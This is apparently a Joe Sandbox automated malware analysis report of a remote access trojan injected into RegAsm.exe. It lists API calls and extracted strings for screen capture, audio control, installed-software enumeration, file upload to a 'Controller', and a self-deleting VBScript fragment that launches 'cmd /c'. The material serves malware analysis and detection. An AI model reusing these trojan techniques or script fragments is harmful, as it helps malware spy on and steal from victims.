Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 4c33483144a6206e2481d487649dabb1675ca56e8a31ab94a4777204e3e8f2ea
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 29C1E73220609309DF2D8679C83013FFAE15AA67B171A2B6FD4B3CB2D4EF18D564D624

Function 004309BD Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: a9be9406364418b117dfccb16ba3cbf4ac398d75b9daafeab1f7aac4f9d83a5b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 28C1B53220619309DF2D8679C83413FFAE15AA57B171A275FD4B3CB2C4EF28E564D624

Function 0041606A Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17c460b684e94a17c9e77f29893b7b1776442f60110699ece81c43363f330e7
Instruction ID: ba4722610437f29e61b715c0b74fc57c743cb2af62776873812a0077e47186ab
Opcode Fuzzy Hash: b17c460b684e94a17c9e77f29893b7b1776442f60110699ece81c43363f330e7
Instruction Fuzzy Hash: 99B1B4391146929ACB05EF24C0913F27BA1FF6A304F1850B9DC9CCFB56E3399516EB64

Function 0041FCB4 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
Instruction ID: 73028a218e6efc437b141c97914250212e1ee116e92d67fc33dd4042d6646766
Opcode Fuzzy Hash: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
Instruction Fuzzy Hash: 2E613B35E0060E9BDF08DFB9D4815EFB7B6FF8C310B10852AE816BB250D7746A498B94

Function 00411D39 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 330windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00411D54
CreateCompatibleDC.GDI32(00000000), ref: 00411D60

Part of subcall function 004121BD: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004121F1

CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DCB
DeleteDC.GDI32(004595D0), ref: 00411DE3
DeleteDC.GDI32(00000000), ref: 00411DE6
DeleteObject.GDI32(?), ref: 00411DEA
SelectObject.GDI32(00000000,00000000), ref: 00411E07
DeleteDC.GDI32(004595D0), ref: 00411E1A
DeleteDC.GDI32(00000000), ref: 00411E1D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,004595D0,00000000,00000000,?,?,00CC0020), ref: 00411E41
GetIconInfo.USER32(?,?), ref: 00411E70
DeleteObject.GDI32(?), ref: 00411E95
DeleteObject.GDI32(?), ref: 00411E9E
DrawIcon.USER32(?,00000000,00000000,?), ref: 00411EAD
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00411ED8
GetObjectA.GDI32(00000000,00000018,?), ref: 00411EFB
LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000), ref: 00411F61
GlobalAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 00411FCA
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00411FEA
DeleteDC.GDI32(004595D0), ref: 00411FFD
DeleteDC.GDI32(00000000), ref: 00412000
DeleteObject.GDI32(00000000), ref: 00412005
GlobalFree.KERNEL32(?), ref: 0041200F
DeleteObject.GDI32(00000000), ref: 004120B4
GlobalFree.KERNEL32(?), ref: 004120BB
DeleteDC.GDI32(004595D0), ref: 004120CA
DeleteDC.GDI32(00000000), ref: 004120D5

Strings

DISPLAY, xrefs: 00411D4D

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
Instruction ID: a12fe5a06dbbbc465c5be36cf98e5f4f0fe68db3817599c41a0b734274edf732
Opcode Fuzzy Hash: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
Instruction Fuzzy Hash: B6C16C75E00219AFDB14DFA4DC45BEEBBB9FF09304F00406AEA05E72A0DB74A945CB59

Function 0041370E Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004137E5
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004137F9
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041381E
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00467C58,00000000), ref: 00413834
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00413875
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041388D
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004138A1
SetEvent.KERNEL32 ref: 004138C2
WaitForSingleObject.KERNEL32(000001F4), ref: 004138D3
CloseHandle.KERNEL32 ref: 004138E3
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00413905
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041390F

Strings

stop audio, xrefs: 00413900
`!t, xrefs: 004137EB
play audio, xrefs: 004137F4
alias audio, xrefs: 0041376F
stopped, xrefs: 004138A6
pause audio, xrefs: 00413870
status audio mode, xrefs: 0041389C
close audio, xrefs: 0041390A
" type , xrefs: 00413787
resume audio, xrefs: 00413888
open ", xrefs: 00413782

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $`!t$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-4223290481
Opcode ID: c835b99e485d985039bb9c1c455f644005d40828fc3dd831cac10fa683763642
Instruction ID: 7cc83dd66f58b781604f24274fbcbce06d703a4d5cc541ca1a03aa14c20c1d7d
Opcode Fuzzy Hash: c835b99e485d985039bb9c1c455f644005d40828fc3dd831cac10fa683763642
Instruction Fuzzy Hash: 5451D4B1A00108BFD705BB75DC96DBF3B6C9E41349B10413FF502A61D2EE785E49866E

Function 00408AD8 Relevance: 35.2, APIs: 6, Strings: 14, Instructions: 237registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408B30
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408B43
SetFileAttributesW.KERNEL32(?,00000080), ref: 00408B5F
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408B8D
ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408DB0
ExitProcess.KERNEL32 ref: 00408DBC

Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484

Strings

open, xrefs: 00408DAA
exepath, xrefs: 00408B0B
\update.vbs, xrefs: 00408B8F
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 00408D64
while fso.FileExists(", xrefs: 00408BF8
fso.DeleteFile ", xrefs: 00408C3E
wend, xrefs: 00408C86
fso.DeleteFolder ", xrefs: 00408CB0
"), xrefs: 00408BE3
""", 0, xrefs: 00408CE7
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 00408BBB
On Error Resume Next, xrefs: 00408BC9
Temp, xrefs: 00408B94
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 00408CFC

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValuechar_traits
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1918141659-2254097358
Opcode ID: 1b31ccbb342cc9f52937740977883d8093ad91a8eaec7a7e4c204ad068d41c4a
Instruction ID: d6e31582f6bbeec3731eba5083e5c30d2f4351ed3cef2ab9d9d1dbed254d7763
Opcode Fuzzy Hash: 1b31ccbb342cc9f52937740977883d8093ad91a8eaec7a7e4c204ad068d41c4a
Instruction Fuzzy Hash: 5A712B31A01208ABDB09EB61E9529EE7769AF50309B64407FB506771D2EF7C2E0EC65C

Function 00408817 Relevance: 35.2, APIs: 6, Strings: 14, Instructions: 216registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 00408880
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408893
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 004088C5
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 004088D3
ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408ACA
ExitProcess.KERNEL32 ref: 00408AD1

Strings

open, xrefs: 00408AC4
exepath, xrefs: 0040885D
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 00408A7E
while fso.FileExists(", xrefs: 00408994
fso.DeleteFile ", xrefs: 004089DA
wend, xrefs: 00408A22
fso.DeleteFolder ", xrefs: 00408A4C
"), xrefs: 0040897F
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 00408956
On Error Resume Next, xrefs: 00408964
5.2.0 Light, xrefs: 00408826
Temp, xrefs: 0040891C
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00408828
.vbs, xrefs: 004088DC

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValue
String ID: ")$.vbs$5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1304132890-534130063
Opcode ID: dd13820d7ae900274139401e805ff05c6af80180eda8e33e14dbdb77a9946d9c
Instruction ID: 4fffedc016be02ce2a268c02f2e0af6a6fdf237cd8678fb7a226089863e9ddbc
Opcode Fuzzy Hash: dd13820d7ae900274139401e805ff05c6af80180eda8e33e14dbdb77a9946d9c
Instruction Fuzzy Hash: B9613C31E00208ABCB09FB61E9529EE7769AF51305B64407FB506771D2EE7C2E0AC65C

Function 0044160D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044169F
_free.LIBCMT ref: 004416C5
_free.LIBCMT ref: 004416EE
_free.LIBCMT ref: 00441726
_free.LIBCMT ref: 00441757
_free.LIBCMT ref: 00441798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00441819
_free.LIBCMT ref: 00441832
_wcschr.LIBVCRUNTIME ref: 0044186F
_free.LIBCMT ref: 004418DB
_free.LIBCMT ref: 00441901
_free.LIBCMT ref: 0044192A
_free.LIBCMT ref: 0044195F
_free.LIBCMT ref: 00441990
_free.LIBCMT ref: 004419D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00441A56
_free.LIBCMT ref: 00441A6F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
Instruction ID: 4237e6e7e157a4c7dbb0d807abf8b9af0d4306fdc3138cecd09bc7ccf606b428
Opcode Fuzzy Hash: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
Instruction Fuzzy Hash: BBD12AB1D047006FEB20AF758851B6F7BA4EF05354F0502AFF9599B3A1EB399880875D

Function 004144B6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?), ref: 004144D3
lstrlenW.KERNEL32(?), ref: 004144FB
FindFirstVolumeW.KERNEL32(?,00000104), ref: 00414522
GetLastError.KERNEL32 ref: 00414530
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 004145A6
lstrcmpW.KERNEL32(?,?), ref: 004145BF
FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 004145D8
FindVolumeClose.KERNEL32(00000018), ref: 00414618
GetLastError.KERNEL32 ref: 0041462C
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0041465E
lstrcatW.KERNEL32(?,?), ref: 00414676
lstrcpyW.KERNEL32(?,?), ref: 00414684
GetLastError.KERNEL32 ref: 0041468C

Strings

?, xrefs: 00414563

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
String ID: ?
API String ID: 1756451316-1684325040
Opcode ID: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
Instruction ID: eb6b54062e2b08fb9c29ba80cfda5f6662be00940462f6bf9b60ec097b87ddd8
Opcode Fuzzy Hash: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
Instruction Fuzzy Hash: C051A375E00219ABCF209FA4DD48AEEB778FF99708F1044A6E509D3250E7788AC5CF59

Function 004434D7 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044351B

Part of subcall function 00442713: _free.LIBCMT ref: 00442730
Part of subcall function 00442713: _free.LIBCMT ref: 00442742
Part of subcall function 00442713: _free.LIBCMT ref: 00442754
Part of subcall function 00442713: _free.LIBCMT ref: 00442766
Part of subcall function 00442713: _free.LIBCMT ref: 00442778
Part of subcall function 00442713: _free.LIBCMT ref: 0044278A
Part of subcall function 00442713: _free.LIBCMT ref: 0044279C
Part of subcall function 00442713: _free.LIBCMT ref: 004427AE
Part of subcall function 00442713: _free.LIBCMT ref: 004427C0
Part of subcall function 00442713: _free.LIBCMT ref: 004427D2
Part of subcall function 00442713: _free.LIBCMT ref: 004427E4
Part of subcall function 00442713: _free.LIBCMT ref: 004427F6
Part of subcall function 00442713: _free.LIBCMT ref: 00442808

_free.LIBCMT ref: 00443510

Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD

_free.LIBCMT ref: 00443532
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443552
_free.LIBCMT ref: 00443574
_free.LIBCMT ref: 00443587
_free.LIBCMT ref: 00443595
_free.LIBCMT ref: 004435A0
_free.LIBCMT ref: 004435D8
_free.LIBCMT ref: 004435DF
_free.LIBCMT ref: 004435FC
_free.LIBCMT ref: 00443614

Strings

pAF, xrefs: 004434ED

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: pAF
API String ID: 161543041-3714919331
Opcode ID: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
Instruction ID: 1e1acce580e4c44e89d7ce72c9cd794b27c1c651c1375113bcda4de26fb62da5
Opcode Fuzzy Hash: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
Instruction Fuzzy Hash: 45316B71A04201AFFB20AE3AD846B97B7E8EF04715F14541FF568D6251DB39AE408B58

Function 0040E783 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E7CF
LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040E815
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E82F
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040E83A
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E877
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E889
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E894
GetProcAddress.KERNEL32(00000000,0045EF50), ref: 0040E8A3
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E8BA

Strings

getnameinfo, xrefs: 0040E7A1
\ws2_32, xrefs: 0040E7F9
\wship6, xrefs: 0040E85B
freeaddrinfo, xrefs: 0040E7AF
getaddrinfo, xrefs: 0040E793, 0040E829, 0040E883

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
Instruction ID: e2fe4f89bec593c1194b96244b36457e88d8aa3fc30695666a9ebb8fa0cbd204
Opcode Fuzzy Hash: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
Instruction Fuzzy Hash: 6531D6B3D01218A7DB20AB62DC48A8F77ACAB05704F0049B7EC08B3241D7789E558BEC

Function 00442811 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00442859
_free.LIBCMT ref: 0044287D
_free.LIBCMT ref: 0044288A
_free.LIBCMT ref: 004428AF
_free.LIBCMT ref: 004428BC
_free.LIBCMT ref: 004428C5
_free.LIBCMT ref: 00442BA3
_free.LIBCMT ref: 00442BAB

Strings

pAF, xrefs: 0044283F, 00442B28

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: pAF
API String ID: 269201875-3714919331
Opcode ID: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
Instruction ID: 220afc4046d47a9c2269d4dee30ff000570bd1da0518462f48b073040ae84213
Opcode Fuzzy Hash: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
Instruction Fuzzy Hash: C7C13575D40604BFEB20DFA9CD42FEE77F8AB08744F54415AFA04FB282D6B4994187A4

Function 00415A94 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 00415ADF
GetCursorPos.USER32(?), ref: 00415AEE
SetForegroundWindow.USER32(?), ref: 00415AF7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00415B11
Shell_NotifyIconA.SHELL32(00000002,00467A48), ref: 00415B62
ExitProcess.KERNEL32 ref: 00415B6A
CreatePopupMenu.USER32 ref: 00415B70
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00415B85

Strings

Close, xrefs: 00415B76

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
Instruction ID: 69ed41baf8013df7edb6dd8303528d2548f60f9075be42ed23a298a7982cfa74
Opcode Fuzzy Hash: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
Instruction Fuzzy Hash: B6213935558208EFDB055FA4ED0EEEA3F25FB45311F000175FA06905B0E7B69960EB5A

Function 0043B1F8 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043B268
_free.LIBCMT ref: 0043B27E
_free.LIBCMT ref: 0043B28F
_free.LIBCMT ref: 0043B2A0
_free.LIBCMT ref: 0043B2B7
GetCPInfo.KERNEL32(?,?), ref: 0043B2FF

Part of subcall function 00445085: _free.LIBCMT ref: 004450F0

_free.LIBCMT ref: 0043B4AB
_free.LIBCMT ref: 0043B4BE
_free.LIBCMT ref: 0043B4CC
_free.LIBCMT ref: 0043B4D7
_free.LIBCMT ref: 0043B519
_free.LIBCMT ref: 0043B521
_free.LIBCMT ref: 0043B529
_free.LIBCMT ref: 0043B531
_free.LIBCMT ref: 0043B53F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
Instruction ID: 233e507832ae68596296c544fe1e2f99e94559176b76bcc42a010ae489b1e6e1
Opcode Fuzzy Hash: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
Instruction Fuzzy Hash: FFB18F71900205AFDB11DF69C881BEEBBF5FF0C308F14506EEA59A7342D77998458BA8

Function 00406046 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406180
GetFileSizeEx.KERNEL32(00000000,?), ref: 004061B6
__aulldiv.LIBCMT ref: 004061E0

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004062E6
ReadFile.KERNEL32(?,00000000,000186A0,?,00000000), ref: 00406301
CloseHandle.KERNEL32(?), ref: 004063C4
CloseHandle.KERNEL32(?), ref: 00406400
CloseHandle.KERNEL32(?), ref: 0040644F

Strings

Uploading file to Controller: , xrefs: 0040625B
SetFilePointerEx error, xrefs: 00406425
ReadFile error, xrefs: 00406419
X|F, xrefs: 004060C8

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $X|F
API String ID: 3086580692-2448825271
Opcode ID: 5f40c9272c2fb33eebd8a6e8cd2b09e0db6637f5d4f811cf83b955913030ff0f
Instruction ID: ce89fbc2bbcb9f21e0201713ae3f479a73954a728a6b624bb473e1a190b651a0
Opcode Fuzzy Hash: 5f40c9272c2fb33eebd8a6e8cd2b09e0db6637f5d4f811cf83b955913030ff0f
Instruction Fuzzy Hash: 72B1CC31E00118ABCB08FBA5D9929EEB7B5AF44314F10812FF906762D1EF785E458B59

Function 00414A74 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00414A96
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414D4A
RegCloseKey.ADVAPI32(?), ref: 00414D5E

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00414A8A
DisplayName, xrefs: 00414B0A
UninstallString, xrefs: 00414B6B
InstallDate, xrefs: 00414B59
Publisher, xrefs: 00414B1D
DisplayVersion, xrefs: 00414B32
InstallLocation, xrefs: 00414B47

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 5f4892e42dbe902014492c28680763cd6feb2fcb298e99d390137e86d4d3e63b
Instruction ID: c6cf66618c576b2a9970c100bb5541a486628a9123b9a16081024123d303fd20
Opcode Fuzzy Hash: 5f4892e42dbe902014492c28680763cd6feb2fcb298e99d390137e86d4d3e63b
Instruction Fuzzy Hash: B4815F719000189FDB19EB61DC52AEEB778AF54305F1041BFB50AB7192EF386F4ACA58

Function 00442C36 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00442CA5
_free.LIBCMT ref: 00442CB3
_free.LIBCMT ref: 00442DE1
_free.LIBCMT ref: 00442DEC

Strings

<VF, xrefs: 00442E2D
@VF, xrefs: 00442E45
<VF, xrefs: 00442E35
pAF, xrefs: 00442C61, 00442E26
tAF, xrefs: 00442E3D

